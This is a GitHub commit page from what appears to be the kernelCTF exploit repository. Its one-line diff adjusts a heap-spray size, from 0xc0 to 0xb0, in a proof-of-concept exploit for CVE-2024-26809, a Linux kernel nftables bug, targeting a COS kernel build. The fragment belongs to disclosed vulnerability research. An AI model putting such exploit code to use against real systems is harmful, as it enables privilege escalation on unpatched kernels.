Skip to content

Commit 1942953

Browse files
committed
Solve comments
1 parent af56692 commit 1942953

File tree

2 files changed

+1
-1
lines changed
  • pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/cos-105-17412.294.34

2 files changed

+1
-1
lines changed
Binary file not shown.

pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/cos-105-17412.294.34/exploit.c

+1-1
Original file line numberDiff line numberDiff line change
@@ -250,7 +250,7 @@ void exploit(struct nl_sock *socket){
250250
//Step 6 Spray heap to get the heap of `nft_table E->udata` back.
251251
while(1){
252252
bitmap_key = i;
253-
new_setelem_with_expr(socket, table, bitmap_set, pad, 0xc0, NULL, &bitmap_key, 2, NULL, 0);
253+
new_setelem_with_expr(socket, table, bitmap_set, pad, 0xb0, NULL, &bitmap_key, 2, NULL, 0);
254254
snprintf(tmp, 0x100, "table for test %d", f);
255255
get_table(socket2, tmp);//[1]
256256
nl_recvmsgs_default(socket2);

0 commit comments

Comments
 (0)